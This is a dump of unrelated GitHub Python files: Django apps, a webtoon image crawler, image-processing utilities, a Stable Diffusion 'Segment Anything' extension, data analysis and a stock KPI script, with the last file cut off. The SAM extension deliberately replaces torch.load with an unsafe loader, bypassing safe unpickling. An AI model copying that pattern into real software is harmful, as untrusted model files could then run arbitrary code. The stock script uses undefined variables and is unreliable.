'last_name', 'is_staff', 'is_superuser','profile_link')\n\n def profile_link(self, obj):\n url = reverse('admin:users_profile_change', args=[obj.profile.id])\n return format_html('<a href=\"{}\">{}</a>', url, obj.profile)\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdminCustom)\n\n\n\n# ##############################################\n# ########## Profile Model Admin ###########\n# ##############################################\n\nclass ProfileForm(forms.ModelForm):\n \"\"\"\n Customize Default Profile form to add queryset\n \"\"\"\n class Meta:\n model = Profile\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args, **kwargs)\n self.fields['country'].queryset = self.fields['country'].queryset.filter(type='Country')\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n \"\"\"\n Customize Default ProfileAdmin\n \"\"\"\n list_display = ('name', 'country', 'organization', 'position','user_link')\n list_filter = ('country',)\n form = ProfileForm\n\n def user_link(self, obj):\n url = reverse('admin:auth_user_change', args=[obj.user.id])\n return format_html('<a href=\"{}\">{}</a>', url, obj.user)\n\n\nadmin.site.register(Profile, ProfileAdmin)\n","repo_name":"iMMAP/rh","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36827262898","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tqdm import tqdm\nfrom urllib.parse import urlparse, parse_qs\nimport os\nfrom assets import BASE_LIST_URL, BASE_DETAIL_URL, HEADERS, WEBTOON2CONFIG\n\n\nclass NaverWebtoonCrawl:\n def __init__(self, webtoon_name_en: str):\n assert webtoon_name_en in list(WEBTOON2CONFIG.keys())\n\n self.webtoon_name_en = webtoon_name_en\n self.webtoon_name_kr = WEBTOON2CONFIG[webtoon_name_en][\"name_kr\"]\n self.id = WEBTOON2CONFIG[webtoon_name_en][\"id\"]\n\n def get_list_html(self, page: int):\n query_params = dict(titleId=self.id, page=page)\n response = requests.get(BASE_LIST_URL, params=query_params, headers=HEADERS)\n html = BeautifulSoup(markup=response.content, features=\"html.parser\")\n return html\n\n def get_detail_html(self, no: int):\n query_params = dict(titleId=self.id, no=no)\n response = requests.get(BASE_DETAIL_URL, params=query_params, headers=HEADERS)\n html = BeautifulSoup(markup=response.content, features=\"html.parser\")\n return html\n\n def get_last_episode_no(self):\n html = self.get_list_html(page=1)\n last_episode_url = html.find(\"td\", {\"class\", \"title\"}).find(\"a\")[\"href\"]\n parsed_url = urlparse(last_episode_url)\n last_episode_no = int(parse_qs(parsed_url.query)[\"no\"][0])\n return last_episode_no\n\n def save_episode_images(self, no: int):\n if not os.path.exists(f\"{self.webtoon_name_en}/{no}/\"):\n os.makedirs(f\"{self.webtoon_name_en}/{no}/\")\n\n html = self.get_detail_html(no=no)\n images = html.find(\"div\", {\"class\", \"wt_viewer\"}).findAll(\"img\")\n\n for idx, image in enumerate(tqdm(images)):\n with open(f\"{self.webtoon_name_en}/{no}/{idx:03d}.jpg\", \"wb\") as file:\n src = requests.get(image[\"src\"], headers=HEADERS)\n file.write(src.content)\n\n def save_all_images(self):\n last_no = self.get_last_episode_no()\n for episode_no in range(1, last_no + 1):\n self.save_episode_images(no=episode_no)\n","repo_name":"SShowbiz/Naver-Webtoon-Crawl","sub_path":"nwc.py","file_name":"nwc.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7843446396","text":"import random\nimport logging\nimport markdown as md\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom . import util\nfrom .forms import newEntryForm\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef index(request):\n if request.method == \"POST\":\n title = request.POST.get(\"entry\")\n # Empty search input case\n if not title:\n return redirect(\"index\")\n else:\n # Entry found case\n entriesList = list(map(str.lower, util.list_entries()))\n if title.lower() in entriesList:\n title = util.list_entries()[entriesList.index(title.lower())]\n return redirect(\"entry\", title=title)\n else:\n # Entry not found case -> search for case insensitive machtes \n matches = [i for i in entriesList if title.lower() in i]\n matchIndexes = [entriesList.index(i) for i in matches]\n matches = [util.list_entries()[i] for i in matchIndexes]\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": matches}) \n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef entry(request, title):\n # Check if entry exists\n if title in util.list_entries():\n entryHTML = md.markdown(util.get_entry(title))\n else:\n entryHTML = False\n\n return render(request, \"encyclopedia/entry.html\", {\n \"entry\": entryHTML,\n \"title\": title,\n })\n\n\ndef newPage(request):\n newEntry = newEntryForm()\n if request.method == \"POST\":\n newEntry = newEntryForm(request.POST)\n if newEntry.is_valid():\n title = newEntry.cleaned_data[\"title\"]\n description = newEntry.cleaned_data[\"description\"]\n entriesList = list(map(str.lower, util.list_entries()))\n if title.lower() not in entriesList:\n util.save_entry(title,description)\n return redirect(\"entry\", title=title)\n else:\n messages.error(request, f\"{title} already exists\")\n\n return render(request, \"encyclopedia/newPage.html\", {\n \"form\": newEntry,\n })\n\n\ndef editPage(request, title):\n newEntry = newEntryForm()\n if request.method == \"POST\":\n newEntry = newEntryForm(request.POST)\n if newEntry.is_valid():\n print(\"cleandata POST: \", newEntry.cleaned_data[\"description\"])\n util.save_entry(newEntry.cleaned_data[\"title\"],\n newEntry.cleaned_data[\"description\"])\n return redirect(\"entry\", title=newEntry.cleaned_data[\"title\"])\n\n newEntry.fields['title'].initial = title\n newEntry.fields['description'].initial = util.get_entry(title)\n print(\"Lines here\")\n print(util.get_entry(title))\n return render(request, \"encyclopedia/editPage.html\", {\n \"title\": title,\n \"form\": newEntry\n })\n\n","repo_name":"AndreiLesi/course_webProgramming","sub_path":"Projekt_1/encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34460270028","text":"from Tkinter import *\r\n\r\nmaster = Tk()\r\nmaster.configure(bg='black')\r\nmaster.wm_attributes(\"-topmost\", 1)\r\n\r\nw = Canvas(master, width=150, height=40, bd=0,relief='ridge',)\r\nw.pack()\r\n\r\ncolor = 100\r\nx0 = 2\r\ny0 = 2\r\nx1 = 151\r\ny1 = 2\r\n\r\nwhile y0 < 20 :\r\n r = color\r\n g = color\r\n b = color\r\n rgb = r, g, b\r\n Hex = '#%02x%02x%02x' % rgb\r\n w.create_line(x0, y0, x1, y1,fill=str(Hex), width=1)\r\n color = color - 2\r\n y0 = y0 + 1\r\n y1 = y1 + 1\r\n\r\ncolor = 10\r\n\r\nwhile y0 < 40 :\r\n r = color\r\n g = color\r\n b = color\r\n rgb = r, g, b\r\n Hex = '#%02x%02x%02x' % rgb\r\n w.create_line(x0, y0, x1, y1,fill=str(Hex), width=1)\r\n color = color + 4\r\n y0 = y0 + 1\r\n y1 = y1 + 1\r\n\r\nw.mainloop()","repo_name":"sainai95/Python-project-builds","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21630366139","text":"import cv2\nimport numpy as np\n\nLR_IMG = cv2.imread('LR/sloth.bmp')\nDIFF_IMG = cv2.imread('diff/sloth.bmp')\nOUTPUT_PATH = 'result/sloth.bmp'\n\ndef upscale(lrImg, diffImg, outputPath):\n\theight, width = diffImg.shape[:2]\n\tdim = (int(width), int(height))\n\tlrImg = cv2.resize(lrImg, dim, interpolation = cv2.INTER_LINEAR)\n\toutputImage = np.zeros((height,width,3),np.uint8)\n\n\tfor i in range(height):\n\t for j in range(width):\n\t aB, aG, aR = lrImg[i,j]\n\t bB, bG, bR = diffImg[i,j]\n\n\t newB = (int(aB) + int(bB)) % 256\n\t newG = (int(aG) + int(bG)) % 256\n\t newR = (int(aR) + int(bR)) % 256\n\t \t\n\t outputImage[i,j] = [newB,newG,newR]\n\n\tcv2.imwrite(outputPath, outputImage)\n\n\nupscale(LR_IMG, DIFF_IMG, OUTPUT_PATH)","repo_name":"sean-horton/image-diff","sub_path":"apply_diff.py","file_name":"apply_diff.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6091987487","text":"import gc\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport torch\r\nimport gradio as gr\r\nfrom collections import OrderedDict\r\nfrom modules import scripts, shared\r\nfrom modules.safe import unsafe_torch_load, load\r\nfrom modules.processing import StableDiffusionProcessingImg2Img\r\nfrom modules.devices import device, torch_gc, cpu\r\nfrom segment_anything import SamPredictor, sam_model_registry\r\n\r\n\r\nmodel_cache = OrderedDict()\r\nsam_model_dir = os.path.join(scripts.basedir(), \"models/sam\")\r\nmodel_list = [f for f in os.listdir(sam_model_dir) if os.path.isfile(\r\n os.path.join(sam_model_dir, f)) and f.split('.')[-1] != 'txt']\r\n\r\n\r\nrefresh_symbol = '\\U0001f504' # 🔄\r\n\r\n\r\nclass ToolButton(gr.Button, gr.components.FormComponent):\r\n \"\"\"Small button with single emoji as text, fits inside gradio forms\"\"\"\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(variant=\"tool\", **kwargs)\r\n\r\n def get_block_name(self):\r\n return \"button\"\r\n\r\n\r\ndef show_mask(image, mask, random_color=False, alpha=0.5):\r\n if random_color:\r\n color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)\r\n else:\r\n color = np.array([30/255, 144/255, 255/255, 0.6])\r\n image[mask] = image[mask] * (1 - alpha) + 255 * \\\r\n color.reshape(1, 1, -1) * alpha\r\n return image.astype(np.uint8)\r\n\r\n\r\ndef load_sam_model(sam_checkpoint):\r\n model_type = '_'.join(sam_checkpoint.split('_')[1:-1])\r\n sam_checkpoint = os.path.join(sam_model_dir, sam_checkpoint)\r\n torch.load = unsafe_torch_load\r\n sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)\r\n sam.to(device=device)\r\n torch.load = load\r\n return sam\r\n\r\n\r\ndef clear_sam_cache():\r\n model_cache.clear()\r\n gc.collect()\r\n torch_gc()\r\n\r\n\r\ndef refresh_sam_models(*inputs):\r\n global model_list\r\n model_list = [f for f in os.listdir(sam_model_dir) if os.path.isfile(\r\n os.path.join(sam_model_dir, f)) and f.split('.')[-1] != 'txt']\r\n dd = inputs[0]\r\n if dd in model_list:\r\n selected = dd\r\n elif len(model_list) > 0:\r\n selected = model_list[0]\r\n else:\r\n selected = None\r\n return gr.Dropdown.update(choices=model_list, value=selected)\r\n\r\n\r\ndef sam_predict(model_name, input_image, positive_points, negative_points):\r\n print(\"Initializing SAM\")\r\n image_np = np.array(input_image)\r\n image_np_rgb = image_np[..., :3]\r\n\r\n if model_name in model_cache:\r\n sam = model_cache[model_name]\r\n if shared.cmd_opts.lowvram:\r\n sam.to(device=device)\r\n elif model_name in model_list:\r\n clear_sam_cache()\r\n model_cache[model_name] = load_sam_model(model_name)\r\n sam = model_cache[model_name]\r\n else:\r\n Exception(\r\n f\"{model_name} not found, please download model to models/sam.\")\r\n\r\n predictor = SamPredictor(sam)\r\n print(f\"Running SAM Inference {image_np_rgb.shape}\")\r\n predictor.set_image(image_np_rgb)\r\n point_coords = np.array(positive_points + negative_points)\r\n point_labels = np.array(\r\n [1] * len(positive_points) + [0] * len(negative_points))\r\n masks, _, _ = predictor.predict(\r\n point_coords=point_coords,\r\n point_labels=point_labels,\r\n multimask_output=True,\r\n )\r\n if shared.cmd_opts.lowvram:\r\n sam.to(cpu)\r\n gc.collect()\r\n torch_gc()\r\n print(\"Creating output image\")\r\n masks_gallery = []\r\n mask_images = []\r\n\r\n for mask in masks:\r\n blended_image = show_mask(image_np, mask)\r\n masks_gallery.append(Image.fromarray(mask))\r\n mask_images.append(Image.fromarray(blended_image))\r\n return mask_images + masks_gallery\r\n\r\n\r\nclass Script(scripts.Script):\r\n\r\n def title(self):\r\n return 'Segment Anything'\r\n\r\n def show(self, is_img2img):\r\n # TODO: Here I bypassed a bug inside module.img2img line 154, should be scripts_img2img instead.\r\n # return scripts.AlwaysVisible if is_img2img else False\r\n return scripts.AlwaysVisible\r\n\r\n def ui(self, is_img2img):\r\n # if is_img2img:\r\n with gr.Accordion('Segment Anything', open=False, elem_id=id('accordion')):\r\n with gr.Column():\r\n gr.HTML(value=\"<p>Left click the image to add one positive point (black dot). Right click the image to add one negative point (red dot). Left click the point to remove it.</p>\", label=\"Positive points\")\r\n with gr.Row():\r\n model_name = gr.Dropdown(label=\"Model\", elem_id=\"sam_model\", choices=model_list,\r\n value=model_list[0] if len(model_list) > 0 else None)\r\n refresh_models = ToolButton(value=refresh_symbol)\r\n refresh_models.click(\r\n refresh_sam_models, model_name, model_name)\r\n input_image = gr.Image(label=\"Image for Segment Anything\", elem_id=\"sam_input_image\",\r\n show_label=False, source=\"upload\", type=\"pil\", image_mode=\"RGBA\")\r\n dummy_component = gr.Label(visible=False)\r\n mask_image = gr.Gallery(\r\n label='Segment Anything Output', show_label=False, elem_id='sam_gallery').style(grid=3)\r\n run_button = gr.Button(value=\"You cannot preview segmentation because you have not added dot prompt.\", interactive=False, elem_id=\"sam_run_button\")\r\n with gr.Row():\r\n enabled = gr.Checkbox(\r\n value=False, label=\"Copy to Inpaint Upload\", elem_id=\"sam_impaint_checkbox\")\r\n chosen_mask = gr.Radio(label=\"Choose your favorite mask: \", value=\"0\", choices=[\r\n \"0\", \"1\", \"2\"], type=\"index\")\r\n\r\n run_button.click(\r\n fn=sam_predict,\r\n _js='submit_sam',\r\n inputs=[model_name, input_image,\r\n dummy_component, dummy_component],\r\n outputs=[mask_image],\r\n show_progress=False)\r\n return [enabled, input_image, mask_image, chosen_mask]\r\n\r\n def process(self, p: StableDiffusionProcessingImg2Img, enabled=False, input_image=None, mask=None, chosen_mask=0):\r\n if not enabled or input_image is None or mask is None or not isinstance(p, StableDiffusionProcessingImg2Img):\r\n return\r\n p.init_images = [input_image]\r\n p.image_mask = Image.open(mask[chosen_mask + 3]['name'])\r\n","repo_name":"Code-dogcreatior/SAM-segment-selection","sub_path":"scripts/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15575256907","text":"import os\n\nimport pandas as pd\n\n\ndef create_export_name(file_dir, file_name):\n \"\"\"\n modify principles according to file name\n :param file_dir:\n :param file_name: 监测数据-xx湖x湖-date.csv\n :return:\n \"\"\"\n export_name = ''\n date = file_name.split('_')[2]\n if file_name.__contains__('dushu_inner'):\n export_name = '监测数据-独墅湖内湖-'\n elif file_name.__contains__('dushu_outer'):\n export_name = '监测数据-独墅湖外湖-'\n elif file_name.__contains__('jinji_outer'):\n export_name = '监测数据-金鸡湖外湖-'\n elif file_name.__contains__('jinji_inner'):\n export_name = '监测数据-金鸡湖内湖-'\n\n return file_dir + export_name + date.split('.')[0] + '.csv'\n\n\ndef merge_access_data(file_dir, file_name):\n \"\"\"\n SQL for generate the xlsx file from accessDB:\n SELECT parameterdata.*\n FROM CruiseTask INNER JOIN ParameterData ON CruiseTask.id = ParameterData.taskId\n WHERE cruisetask.id = {};\n :param file_name:\n :return: exported csv similar to 启澄\n \"\"\"\n # read .xlsx file\n df = pd.read_excel(file_dir + file_name)\n drop_list = ['id', 'taskId', 'parameterId']\n\n # drop useless attributes, sort by time and reset index\n df = df.drop(drop_list, axis=1) \\\n .sort_values(by='reportTime') \\\n .reset_index(drop=True)\n\n # rename attributes and find all parameter names\n df.rename(columns={'lon': '经度', 'lat': '纬度', 'reportTime': '时间'}, inplace=True)\n attrs = list(df['parameterName'].unique())\n\n # inner join by report time\n new_df = df[['时间', '经度', '纬度']].drop_duplicates().dropna().reset_index(drop=True)\n for i, attr in enumerate(attrs):\n a = df.where(df['parameterName'] == attr).dropna()\n a.rename(columns={'value': attr}, inplace=True)\n a = a[['时间', attr]].drop_duplicates(subset='时间').dropna().reset_index(drop=True)\n\n new_df = pd.merge(new_df, a, how='inner', on='时间')\n new_df.rename(columns={'氨氮': '氨氮值', '深度(m)': '低频水深(m)'}, inplace=True)\n\n # save as csv\n save_dir = './datasets/temp1/'\n export_name = create_export_name(save_dir, file_name)\n new_df.to_csv(export_name, index=False, encoding='utf_8_sig')\n\n\ndef merge_access_data_all(file_dir):\n \"\"\"\n :param file_dir: './datasets/temp/'\n :return:\n \"\"\"\n for file in os.listdir(file_dir):\n # print(create_export_name('./datasets/temp1/', file))\n merge_access_data(file_dir, file)\n\n\ndef delete_rows(file_dir):\n for file in os.listdir(file_dir):\n df = pd.read_csv(file_dir + file, header=2)\n df['时间'] = pd.to_datetime(df['时间'])\n df.to_csv(file_dir + file, index=False, encoding='utf_8_sig')\n # print(file)\n\n\ndef get_mean_stat(file_dir):\n attrs = ['溶解氧(mg/L)', '总溶解固体', '温度', '藻蛋白',\n '盐度', '浊度', '电导率', '叶绿素', 'PH值']\n stat = pd.DataFrame()\n for file in os.listdir(file_dir):\n loc_date = file.split('-')[1] + file.split('-')[2].split('.')[0]\n try:\n df = pd.read_csv(file_dir + file).dropna()\n desc = df[attrs].describe()\n mean_ = desc.iloc[1, :]\n mean_.name = loc_date\n stat = stat.append(mean_)\n # print(file + ' finished')\n except (KeyError):\n print(file + ' failed')\n stat.to_csv('./datasets/mean_stat1.csv', index=True, encoding='utf_8_sig')\n\n\ndef split_data():\n file_name = './datasets/监测数据/监测数据-独墅_金鸡-20220701.csv'\n dushu = '2022-07-01 11:34:08'\n jinji = '2022-07-01 11:43:50'\n date = file_name.split('-')[2]\n d_name = './datasets/监测数据/监测数据-' + file_name.split('-')[1].split('_')[0] + '-' + date\n j_name = './datasets/监测数据/监测数据-' + file_name.split('-')[1].split('_')[1] + '-' + date\n df = pd.read_csv(file_name)\n\n d_index = df[df['时间'] == dushu].index.values[0]\n j_index = df[df['时间'] == jinji].index.values[0]\n df_dushu = df.iloc[0: d_index].reset_index(drop=True).dropna()\n df_jinji = df.iloc[j_index:].reset_index(drop=True).dropna()\n\n df_dushu.to_csv(d_name, index=False, encoding='utf_8_sig')\n df_jinji.to_csv(j_name, index=False, encoding='utf_8_sig')\n\n\nfile_dir = './datasets/监测数据1/'\nget_mean_stat(file_dir)\n","repo_name":"LesterDawn/personalProjects","sub_path":"blue_green_algae/comparision.py","file_name":"comparision.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20655179330","text":"from contextlib import contextmanager\nfrom os.path import getsize, basename\nfrom tqdm import tqdm\n\n\n@contextmanager\ndef tqdm_open(filename, encoding='utf8'):\n total = getsize(filename)\n\n def wrapped_line_iterator(fd):\n with tqdm(total=total, unit=\"B\", unit_scale=True, desc=basename(filename), miniters=1) as pb:\n processed_bytes = 0\n for line in fd:\n processed_bytes += len(line)\n if processed_bytes >= 1024 * 1024:\n pb.update(processed_bytes)\n processed_bytes = 0\n yield line\n pb.update(processed_bytes)\n\n with open(filename, encoding=encoding) as fd:\n yield wrapped_line_iterator(fd)","repo_name":"IlyaGusev/UNMT","sub_path":"utils/tqdm.py","file_name":"tqdm.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"12796096947","text":"# read tif - scale up - save as ome-tiff\nfrom time import time\nimport pyvips\nimport os\n\ndef tif2ometiff(impth,rsf=1):\n start = time()\n imobj = pyvips.Image.new_from_file(impth)\n # resize image\n imobj = imobj.resize(rsf,kernel='nearest')\n if imobj.hasalpha(): imobj = imobj[:-1]\n # split grayscale to zstack of binary\n\n\n image_height = imobj.height\n image_width = imobj.width\n image_bands = imobj.bands\n imobj = imobj.copy()\n imobj.set_type(pyvips.GValue.gint_type, \"page-height\", image_height)\n imobj.set_type(pyvips.GValue.gstr_type, \"image-description\",\n f\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <OME xmlns=\"http://www.openmicroscopy.org/Schemas/OME/2016-06\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://www.openmicroscopy.org/Schemas/OME/2016-06 http://www.openmicroscopy.org/Schemas/OME/2016-06/ome.xsd\">\n <Image ID=\"Image:0\">\n <!-- Minimum required fields about image dimensions -->\n <Pixels DimensionOrder=\"XYCZT\"\n ID=\"Pixels:0\"\n SizeC=\"{image_bands}\"\n SizeT=\"1\"\n SizeX=\"{image_width}\"\n SizeY=\"{image_height}\"\n SizeZ=\"1\"\n Type=\"uint8\">\n </Pixels>\n </Image>\n </OME>\"\"\")\n end = time()\n print('elapsed {} sec'.format(round(end-start)))\n return imobj\n\n\nif __name__ == '__main__':\n src = '/Volumes/Digital pathology image lib/JHU/Laura Wood/BTC project/230501 BTC patient002/DLTL run1/DLTLprocess_single/ImAnnotationbyCNN_run2'\n imnm = 'z-0053_2023-03-30 13.48.54_DLAnnMap_1.tif'\n outnm = imnm.replace('tif','ome.tiff')\n\n impth = os.path.join(src,imnm)\n ometiff = tif2ometiff(impth,rsf=4)\n\n #Compression Types: jpeg,jp2k,lzw\n # choose jpeg to save space\n # choose lzw for loseless compression of tissue segmentation map\n # don't use jp2k. its behavior is a bit wierd for now\n ometiff.tiffsave(os.path.join(src,outnm), compression=\"lzw\", tile=True,\n tile_width=512, tile_height=512,\n pyramid=True, subifd=True)\n","repo_name":"Wirtz-Lab/wsi_analysis","sub_path":"kyu/complete/tif2ometif.py","file_name":"tif2ometif.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5014908802","text":"from django.db import models\nfrom imagekit.models import ProcessedImageField\nfrom imagekit.processors import Thumbnail\nfrom django.conf import settings\n\n# Create your models here.\n# 프로필\nclass Profile(models.Model):\n nickname = models.CharField(max_length=20, blank=True)\n image = ProcessedImageField(\n blank=True,\n processors=[\n Thumbnail(300,300),\n ],\n format='png', \n )\nuser = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE) #1대1\n#CASCADE: user가 삭제되면 프로필 정보도 같이 삭제된다.","repo_name":"Kyeonga-Kim/TIL","sub_path":"Web/Django/formclass/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7896541712","text":"from models import metrics, prepare_data\r\nimport numpy as np\r\nfrom table import draw_plot\r\nfrom sksurv.ensemble import ComponentwiseGradientBoostingSurvivalAnalysis\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\nX_train, y_train, X_test, y_test = prepare_data.get_train_test()\r\n\r\nrandom_state = 64\r\n\r\nparam_grid = {\r\n 'loss': ['ipcwls', 'coxph', 'squared'],\r\n 'learning_rate': [0.05, 0.1],\r\n 'n_estimators' : [100, 500, 1000],\r\n 'dropout_rate' : [0.0, 0.1]\r\n}\r\n\r\ncwgbs = ComponentwiseGradientBoostingSurvivalAnalysis(random_state=random_state)\r\n\r\nCV_cwgbs = GridSearchCV(estimator=cwgbs, param_grid=param_grid, cv=5, verbose=3)\r\nCV_cwgbs.fit(X_train, y_train)\r\n\r\nprint(CV_cwgbs.best_params_)\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'ipcwls', 'n_estimators': 1000}\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'coxph', 'n_estimators': 100}\r\n# {'dropout_rate': 0.0, 'learning_rate': 0.1, 'loss': 'coxph', 'n_estimators': 1000}","repo_name":"k1rezaei/Survival-Analysis","sub_path":"dataset_and_other_models/grid_search_cwgbs.py","file_name":"grid_search_cwgbs.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580664749","text":"# 12. Write a program that accepts a sequence of whitespace separated words as input and\n# prints the words after removing all duplicate words and\n# sorting them alphanumerically.\n# Suppose the following input is supplied to the program:\n# hello world and practice makes perfect and hello world again\n# Then, the output should be:\n# again and hello makes perfect practice world\n\nprint(\"Enter string\")\nstring = input(\">>> \")\n\nstring_list = string.split(\" \")\nunique_words = list(set(string_list))\nunique_words.sort()\n\nprint(\" \".join(unique_words))\n","repo_name":"JangirSumit/data_science","sub_path":"11th-12th May Assignments/case study 1/question_12.py","file_name":"question_12.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"3904769917","text":"import os;\ntmp = \"\";\ntmp2 = \"\";\nwhile 1 == 1:\n\ttmp = tmp = os.popen(\"mpc current\").read();\n\tif tmp != tmp2:\n\t\ttmp2 = tmp = os.popen(\"mpc current\").read();\n\t\tfile = open(\"/var/www/html/current.html\",\"w\");\n\t\tfile.write(\"<!DOCTYPE html><html><head><meta charset='utf-8'><meta http-equiv='refresh' content='1'><title>

\");\n\t\tfile.write(str(tmp2));\n\t\tfile.write(\"

\")\n\t\tfile.close();\n","repo_name":"Anton-Kuscher/PiPlayer","sub_path":"home/pi/webinterface/getcurrent.py","file_name":"getcurrent.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37884987042","text":"# @author Shaw Young\r\n# @version 10.24.21\r\n\r\nimport yfinance as yf\r\nimport numpy as np\r\n# from numpy import arange\r\n# from matplotlib import pyplot\r\nfrom csv import DictReader\r\nimport pickle\r\nfrom lmfit.models import ExpressionModel\r\n\r\n# Parses through all tickers in a csv file sourced from the NASDAQ \r\n# and determines a Key Performance Indicator (KPI) for each security\r\ndef parse_thru_tickers():\r\n out = dict()\r\n with open('snp500.csv', 'r') as read_obj:\r\n reader = DictReader(read_obj)\r\n for row in reader:\r\n try:\r\n out[row['Symbol']] = lin_reg_ticker(row['Symbol'])\r\n except ValueError:\r\n break\r\n\r\n return out\r\n# Exponential Function\r\ndef func(x, a, b, c):\r\n\treturn a*np.exp(b*x) + c\r\n\r\n# Input is a ticker - outputs a KPI calculated\r\n# by using an Exponential regression\r\ndef lin_reg_ticker(t):\r\n x = list()\r\n y = list() \r\n i = 0\r\n\r\n ticker_data = yf.Ticker(t)\r\n ticker_historical = ticker_data.history(period=\"max\", interval=\"3mo\")\r\n \r\n for index, row in ticker_historical.iterrows():\r\n if not np.isnan(row['Low']):\r\n y.append(row['Low'])\r\n x.append(i)\r\n i = i+1\r\n \r\n try:\r\n # Weighted Exponential Regression\r\n exponential_model = ExpressionModel(\"a * exp(b * x) + c\", [\"x\"], None, 'omit' )\r\n fitted_model = exponential_model.fit(y_arr, x=x_arr, a=5, b=1, c=1)\r\n KPI = fitted_model.params['a'].value\r\n return KPI\r\n \r\n except: \r\n return -1;\r\n\r\n # To print a plot of the linear regression \r\n # \r\n # pyplot.scatter(x_arr,y_arr)\r\n # x_line = arange(min(x_arr), max(x_arr), 1) \r\n # y_line = func(x_line, a, b, c)\r\n # pyplot.plot(x_line, y_line, '--', color='red')\r\n # pyplot.savefig(\"plot\")\r\n \r\n return KPI\r\n\r\nif __name__ == \"__main__\":\r\n out = parse_thru_tickers()\r\n pickle_out = open(\"KPIs.pickle\",\"wb\")\r\n pickle.dump(out, pickle_out)\r\n pickle_out.close()","repo_name":"BenAltermatt/EthicalInvesting","sub_path":"assess_value.py","file_name":"assess_value.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780394047","text":"# Nikita Akimov\n# interplanety@interplanety.org\n#\n# GitHub\n# https://github.com/Korchy/BIS\n\n\nimport os\nimport bpy\nimport zipfile\nfrom .file_manager import FileManager\n\n\nclass DataBlockManager:\n\n # abstract class for common data block for saving/loading it in BIS\n\n _limit_file_size = 3*1024*1024 # max exported to .blend and zipped file size (3 Mb)\n\n @classmethod\n def export_to_blend(cls, context, data_block: set, export_path: str, export_file_name: str):\n # saves data block to the export_path directory in a *.blend format and zip it. Returns full path to the file\n rez = None\n if data_block:\n file_name = export_file_name + '.blend'\n file_path = os.path.join(export_path, file_name)\n context.blend_data.libraries.write(file_path, data_block)\n if os.path.exists(file_path):\n zip_file_name = export_file_name + '.zip'\n zip_file_path = os.path.join(export_path, zip_file_name)\n zip_file = zipfile.ZipFile(zip_file_path, 'w')\n zip_file.write(\n filename=file_path,\n compress_type=zipfile.ZIP_DEFLATED,\n arcname=file_name\n )\n zip_file.close()\n if os.path.exists(zip_file_path):\n if os.stat(zip_file_path).st_size < cls._limit_file_size:\n rez = zip_file_path\n else:\n bpy.ops.bis.messagebox(\n 'INVOKE_DEFAULT',\n message='ERR: Saving meshes must be less ' +\n str(round(cls._limit_file_size/1024/1024)) +\n ' Mb after zip export'\n )\n else:\n bpy.ops.bis.messagebox('INVOKE_DEFAULT', message='ERR: No data to save')\n return rez\n\n @classmethod\n def import_from_blend(cls, context, zip_file_path, file_name, data_block_type, data_block_name=None):\n # add meshes to scene from zipped archive with *.blend file\n rez = []\n # import data block from .blend file\n if os.path.exists(zip_file_path):\n path = os.path.dirname(zip_file_path)\n full_path = os.path.join(path, file_name + '.blend')\n FileManager.unzip_files(\n source_zip_path=zip_file_path,\n dest_dir=path\n )\n if os.path.exists(full_path):\n with bpy.data.libraries.load(full_path) as (data_from, data_to):\n if data_block_name is None:\n setattr(\n data_to,\n data_block_type,\n getattr(data_from, data_block_type)\n )\n else:\n setattr(\n data_to,\n data_block_type,\n [name for name in 